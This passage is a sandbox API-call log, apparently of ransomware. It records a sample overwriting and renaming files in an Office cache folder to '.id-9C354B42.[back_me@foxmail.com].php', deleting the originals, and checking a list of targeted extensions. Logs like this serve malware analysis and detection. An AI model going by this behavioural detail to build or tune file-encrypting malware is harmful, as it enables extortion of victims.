dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.521] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.521] ReadFile (in: hFile=0x194, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.536] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.537] WriteFile (in: hFile=0x194, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0050.829] SetEndOfFile (hFile=0x194) returned 1 [0050.829] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0050.841] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.841] WriteFile (in: hFile=0x194, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.843] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.843] WriteFile (in: hFile=0x194, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.845] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.845] WriteFile (in: hFile=0x194, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.847] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0050.847] CloseHandle (hObject=0x194) returned 1 [0051.109] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.109] lstrlenW (lpString=".doc") returned 4 [0051.109] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.109] lstrlenW (lpString=".docx") returned 5 [0051.109] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.109] lstrlenW (lpString=".pdf") returned 4 [0051.109] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.109] lstrlenW (lpString=".xls") returned 4 [0051.109] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.109] lstrlenW (lpString=".xlsx") returned 5 [0051.109] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.109] lstrlenW (lpString=".ppt") returned 4 [0051.109] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.109] lstrlenW (lpString=".zip") returned 4 [0051.109] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.109] lstrlenW (lpString=".rar") returned 4 [0051.109] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.109] lstrlenW (lpString=".bz2") returned 4 [0051.110] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString=".7z") returned 3 [0051.110] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString=".dbf") returned 4 [0051.110] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString=".1cd") returned 4 [0051.110] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString=".jpg") returned 4 [0051.110] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString=".doc") returned 4 [0051.110] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString=".docx") returned 5 [0051.110] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0051.110] lstrlenW (lpString=".pdf") returned 4 [0051.110] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0051.110] lstrlenW (lpString=".xls") returned 4 [0051.110] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0051.110] lstrlenW (lpString=".xlsx") returned 5 [0051.110] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0051.110] lstrlenW (lpString=".ppt") returned 4 [0051.110] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0051.110] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.110] lstrlenW (lpString=".zip") returned 4 [0051.110] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0051.110] lstrlenW (lpString=".rar") returned 4 [0051.110] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0051.110] lstrlenW (lpString=".bz2") returned 4 [0051.110] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0051.110] lstrlenW (lpString=".7z") returned 3 [0051.111] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0051.111] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.111] lstrlenW (lpString=".dbf") returned 4 [0051.111] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0051.111] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.111] lstrlenW (lpString=".1cd") returned 4 [0051.111] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0051.111] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0051.111] lstrlenW (lpString=".jpg") returned 4 [0051.111] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0051.111] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0051.111] lstrlenW (lpString="setup.exe") returned 9 [0051.111] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0051.111] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=1377656) returned 1 [0051.111] CloseHandle (hObject=0x198) returned 1 [0051.111] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0051.112] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.112] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0051.112] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.112] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.112] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.112] GetLastError () returned 0x0 [0051.112] ReadFile (in: hFile=0x198, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.150] WriteFile (in: hFile=0x194, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.288] ReadFile (in: hFile=0x198, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x50588, lpOverlapped=0x0) returned 1 [0051.300] WriteFile (in: hFile=0x194, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0051.308] ReadFile (in: hFile=0x198, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.308] WriteFile (in: hFile=0x194, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0051.308] SetEndOfFile (hFile=0x194) returned 1 [0051.308] CloseHandle (hObject=0x194) returned 1 [0051.309] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.309] SetEndOfFile (hFile=0x198) returned 1 [0051.312] CloseHandle (hObject=0x198) returned 1 [0051.312] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.312] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0051.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.312] lstrlenW (lpString=".doc") returned 4 [0051.312] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.312] lstrlenW (lpString=".docx") returned 5 [0051.312] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.313] lstrlenW (lpString=".pdf") returned 4 [0051.313] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString=".xls") returned 4 [0051.313] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString=".xlsx") returned 5 [0051.313] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.313] lstrlenW (lpString=".ppt") returned 4 [0051.313] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString=".zip") returned 4 [0051.313] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString=".rar") returned 4 [0051.313] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString=".bz2") returned 4 [0051.313] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.313] lstrlenW (lpString=".7z") returned 3 [0051.313] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString=".dbf") returned 4 [0051.313] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString=".1cd") returned 4 [0051.313] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString=".jpg") returned 4 [0051.313] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.313] lstrlenW (lpString=".doc") returned 4 [0051.313] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.313] lstrlenW (lpString=".docx") returned 5 [0051.313] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.313] lstrlenW (lpString=".pdf") returned 4 [0051.314] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.314] lstrlenW (lpString=".xls") returned 4 [0051.314] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.314] lstrlenW (lpString=".xlsx") returned 5 [0051.314] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.314] lstrlenW (lpString=".ppt") returned 4 [0051.314] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.314] lstrlenW (lpString=".zip") returned 4 [0051.314] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.314] lstrlenW (lpString=".rar") returned 4 [0051.314] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.314] lstrlenW (lpString=".bz2") returned 4 [0051.314] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.314] lstrlenW (lpString=".7z") returned 3 [0051.314] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.314] lstrlenW (lpString=".dbf") returned 4 [0051.314] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.314] lstrlenW (lpString=".1cd") returned 4 [0051.314] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.314] lstrlenW (lpString=".jpg") returned 4 [0051.314] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.314] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0051.314] lstrlenW (lpString="osetup.dll") returned 10 [0051.314] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.482] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=7378792) returned 1 [0051.482] CloseHandle (hObject=0x210) returned 1 [0051.482] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0051.482] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.482] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0051.483] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.483] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0051.483] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0051.483] ReadFile (in: hFile=0x210, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.488] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0051.488] ReadFile (in: hFile=0x210, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.494] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.494] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0051.494] ReadFile (in: hFile=0x210, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.517] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.517] WriteFile (in: hFile=0x210, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0051.608] SetEndOfFile (hFile=0x210) returned 1 [0051.608] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x434d950 [0052.281] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.281] WriteFile (in: hFile=0x210, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.282] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.282] WriteFile (in: hFile=0x210, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.284] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0052.284] WriteFile (in: hFile=0x210, lpBuffer=0x434d950*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x434d950*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.286] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x434d950 | out: hHeap=0xb10000) returned 1 [0052.286] CloseHandle (hObject=0x210) returned 1 [0052.286] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.286] lstrlenW (lpString=".doc") returned 4 [0052.286] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.286] lstrlenW (lpString=".docx") returned 5 [0052.286] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0052.286] lstrlenW (lpString=".pdf") returned 4 [0052.286] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.286] lstrlenW (lpString=".xls") returned 4 [0052.286] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.286] lstrlenW (lpString=".xlsx") returned 5 [0052.287] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0052.287] lstrlenW (lpString=".ppt") returned 4 [0052.287] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString=".zip") returned 4 [0052.287] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.287] lstrlenW (lpString=".rar") returned 4 [0052.287] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.287] lstrlenW (lpString=".bz2") returned 4 [0052.287] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.287] lstrlenW (lpString=".7z") returned 3 [0052.287] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString=".dbf") returned 4 [0052.287] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString=".1cd") returned 4 [0052.287] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString=".jpg") returned 4 [0052.287] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.287] lstrlenW (lpString=".doc") returned 4 [0052.287] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.287] lstrlenW (lpString=".docx") returned 5 [0052.287] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0052.287] lstrlenW (lpString=".pdf") returned 4 [0052.287] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.288] lstrlenW (lpString=".xls") returned 4 [0052.288] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.288] lstrlenW (lpString=".xlsx") returned 5 [0052.288] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0052.288] lstrlenW (lpString=".ppt") returned 4 [0052.288] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.288] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.288] lstrlenW (lpString=".zip") returned 4 [0052.288] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.288] lstrlenW (lpString=".rar") returned 4 [0052.288] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.288] lstrlenW (lpString=".bz2") returned 4 [0052.288] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.288] lstrlenW (lpString=".7z") returned 3 [0052.288] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.288] lstrlenW 